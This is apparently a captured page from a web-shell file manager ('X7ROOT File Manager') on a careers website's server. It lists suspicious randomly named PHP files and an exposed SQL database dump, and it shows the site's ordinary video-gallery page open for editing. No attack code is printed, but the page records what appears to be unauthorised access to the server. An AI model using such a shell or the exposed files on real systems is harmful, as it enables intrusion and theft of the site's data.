X7ROOT File Manager
Current Path:
/home/bmglobalcareers/public_html
home
/
bmglobalcareers
/
public_html
/
📁
..
📄
.htaccess
(243 B)
📄
7e8fcfa2f51affa33b3fa699f35ec4ad.html
(51 B)
📁
Emails
📁
_errorpages
📄
about.php
(4.23 KB)
📄
admin.php
(4.23 KB)
📄
appointment.php
(26.94 KB)
📄
appointment_old.php
(29.26 KB)
📄
bmglobalcareers_bm.sql
(859.73 KB)
📁
check
📁
commentsos
📄
contact.php
(2.72 KB)
📄
contact_mail.php
(18.97 KB)
📁
css
📄
education_loan.php
(12.32 KB)
📄
filters.php
(824 B)
📁
fonts
📄
footer.php
(9.94 KB)
📁
gfherhfghre
📄
header.php
(10.44 KB)
📁
images
📄
index.html
(181 B)
📄
index.php
(15.17 KB)
📄
join_our_community.php
(8.37 KB)
📁
js
📁
ktgadmin
📄
l0ldae.php
(3.89 KB)
📁
net
📄
ob.php
(0 B)
📄
p0nj7l.php
(3.89 KB)
📄
process.php
(2.96 KB)
📄
rmxt5d.php
(1.4 KB)
📄
robots.txt
(978 B)
📄
route_map.php
(5.68 KB)
📄
services.php
(2.61 KB)
📄
test.html
(1.37 KB)
📄
test_mail.php
(824 B)
📁
uploads
📄
utchihaWSo_wEq2w.php
(0 B)
📄
utchiha_1ldSxK1Y.php
(8 KB)
📄
utchiha_3ovmPINW.txt
(9 B)
📄
utchiha_8JYmBVa0.php
(0 B)
📄
utchiha_9AwhI32Q.php
(0 B)
📄
utchiha_DmF3lPsM.php
(8 KB)
📄
utchiha_EDirtMq6.php
(8 KB)
📄
utchiha_HGax88RT.txt
(10 B)
📄
utchiha_Js0AkoBP.php
(8 KB)
📄
utchiha_MZpQ5gcI.php
(0 B)
📄
utchiha_RW54Vwo0.php
(0 B)
📄
utchiha_ZXckxdr2.php
(0 B)
📄
utchiha_gGs7o5Gx.php
(0 B)
📄
utchiha_hhjIolpM.php
(8 KB)
📄
utchiha_wfJINYGr.php
(214.79 KB)
📄
utchiha_z5d2rSoQ.php
(0 B)
📁
vendors
📄
videos.php
(7.56 KB)
Editing: videos.php
<?php include('header.php') ?> <section class="page-banner"> <div class="image-layer" style="background-image:url(images/background/image-7.jpg);"></div> <div class="shape-1"></div> <div class="shape-2"></div> <div class="banner-inner"> <div class="auto-container"> <div class="inner-container clearfix"> <h1 style="font-size: 60px;">Videos</h1> <div class="page-nav"> <ul class="bread-crumb clearfix"> <li><a href="index.php">Home</a></li> <li class="active">Videos</li> </ul> </div> </div> </div> </div> </section> <section class="auto-container"> <div class="sec-title centered"> <h2 style="margin-top:30px ;">Videos</h2> </div> <div class="row"> <div class="col-lg-12"> <div class="section-padding gallery-section" id="gallery" style="padding-top: 0px;"> <div class="container"> <div id="btncontainer" class="filter"> <a class="btn btn-active" href="#all">ALL</a> <?php $sql_video_cat="SELECT * FROM `tbl_category` where delete_status='NDL' ORDER BY `id` ASC"; $exc_query_video_cat=mysqli_query($conn,$sql_video_cat); while($fetch_video_cat=mysqli_fetch_array($exc_query_video_cat)){ ?> <a class="btn" href="#category-<?php echo $fetch_video_cat['id']; ?>"><?php echo $fetch_video_cat['title']; ?></a> <?php } ?> </div> <!-- Gallery Section Start --> <div class="gallery sets"> <?php $sql_video="SELECT * FROM `tbl_videos_details` where delete_status='NDL' ORDER BY `vcat_dt_id` DESC"; $exc_query_video=mysqli_query($conn,$sql_video); while($fetch_video=mysqli_fetch_array($exc_query_video)){ $title=$fetch_video['title']; $url_link=$fetch_video['url']; ?> <div class="news-block-two category-<?php echo $fetch_video['cat_id']; ?>"> <div class="inner-box"> <div class="image-box"> <a href="#"><img src="http://img.youtube.com/vi/<?php echo $url_link?>/sddefault.jpg" alt=""></a> <a href="https://www.youtube.com/watch?v=<?php echo $url_link?>" class="vid-link lightbox-image"> <div class="icon"><span class="flaticon-play-button-1"></span></div> </a> </div> </div> </div> <?php } ?> </div> </div> </div> </div> <!-- <?php $sql_video="SELECT * FROM `tbl_videos_details` where delete_status='NDL' ORDER BY `vcat_dt_id` DESC"; $exc_query_video=mysqli_query($conn,$sql_video); while($fetch_video=mysqli_fetch_array($exc_query_video)){ $title=$fetch_video['title']; $url_link=$fetch_video['url']; ?> <div class="col-lg-3"> <div class="news-block-two"> <div class="inner-box"> <div class="image-box"> <a href="blog-single.html"><img src="http://img.youtube.com/vi/<?php echo $url_link?>/sddefault.jpg" alt=""></a> <a href="https://www.youtube.com/watch?v=<?php echo $url_link?>" class="vid-link lightbox-image"> <div class="icon"><span class="flaticon-play-button-1"></span></div> </a> </div> </div> </div> </div> <?php } ?> --> </div> </section> <style type="text/css"> .all { text-decoration: none; cursor: pointer; outline: 0; } .section-padding { padding-top: 80px; } .gallery-section { position: relative; z-index: 1; } .title { font-size: 46px; font-weight: 700; font-family: "Playfair Display", serif; color: #f44336; } .filter { text-align: center; max-width: 1050px; margin: auto; } .btn { padding: 10px 20px; margin: 5px 4px 4px 0; display: inline-block; color: #003; background: #f1c852; transition: all 0.4s; border-radius: 10px; font-size: 16px; font-weight: 500; } .btn:hover,.btn-active { background: #075767; color: white; -webkit-transform: translateY(3px); -ms-transform: translateY(3px); transform: translateY(3px); } .gallery { display: flex; justify-content: center; width: fit-content; max-width: 1320px; flex-wrap: wrap; margin: 25px auto; /* gap: 14px; */ } .gallery a { display: flex; } .gallery img { width: 200px; height: 220px; object-fit: cover; transition: 0.3s ease-in-out; border-radius: 12px; overflow: hidden; margin: 10px 10px; } .gallery img:hover { transform: scale(1.1); } .sets .hide, .sets .pophide { width: 0%; opacity: 0; } .closeBtn { position: absolute; font-size: 22px; font-weight: 500; right: 25px; top: 25px; color: white; transition: 0.5s linear; padding: 8px 40px; border-radius: 25px; background: red; outline-offset: -6px; outline: 2px solid #fff; } .closeBtn:hover { cursor: pointer; background: white; color: black; outline: 2px solid #000; } .openDiv { width: 100%; height: 100vh; background: #000000e7; position: fixed; top: 0; display: flex; flex-direction: column; align-items: center; justify-content: center; left: 0; z-index: 9999; } .imgPreview { width: 70%; object-fit: scale-down; max-height: 40vw; height: auto; } .prevButton, .nextButton { transition: 1s linear; padding: 10px 35px; font-size: 18px; border: none; color: white; background: #0005; border-radius: 10px; border: 1px solid white; margin: 10px; } .prevButton:hover, .nextButton:hover { background: #fff; color: black; } /* resposive CSS Code */ @media max-width: 1199px { .section-padding { padding-top: 70px; } } @media (max-width: 991px) { .section-padding { padding-top: 50px; } } @media (max-width: 767px) { .title { font-size: 36px; } .gallery img { margin: 8px 8px; width: 175px; } .closeBtn { padding: 6px 25px; } .prevButton, .nextButton { font-size: 18px; padding: 8px 25px; } } @media (max-width: 540px) { .section-padding { padding-top: 30px; } .gallery img { margin: 8px 6px; width: 155px; } .closeBtn { font-size: 18px; border-radius: 15px; } .prevButton, .nextButton { font-size: 18px; padding: 6px 20px; border-radius: 10px; margin: 5px; } .imgPreview { width: 90%; max-height: 50vh; height: auto; } } </style> <script src="https://code.jquery.com/jquery-3.6.4.min.js"></script> <script type="text/javascript"> $(document).ready(function () { $(".filter a").click(function (e) { e.preventDefault(); var category = $(this).attr("href").substring(1); if (category === "all") { $(".gallery .news-block-two").removeClass("hide"); } else { $(".gallery .news-block-two").addClass("hide"); $(".gallery ." + category).removeClass("hide"); } // Add active class to the current button (highlight it) $(".filter a").removeClass("btn-active"); $(this).addClass("btn-active"); }); }); </script> <?php include('footer.php') ?>
Upload File
Create Folder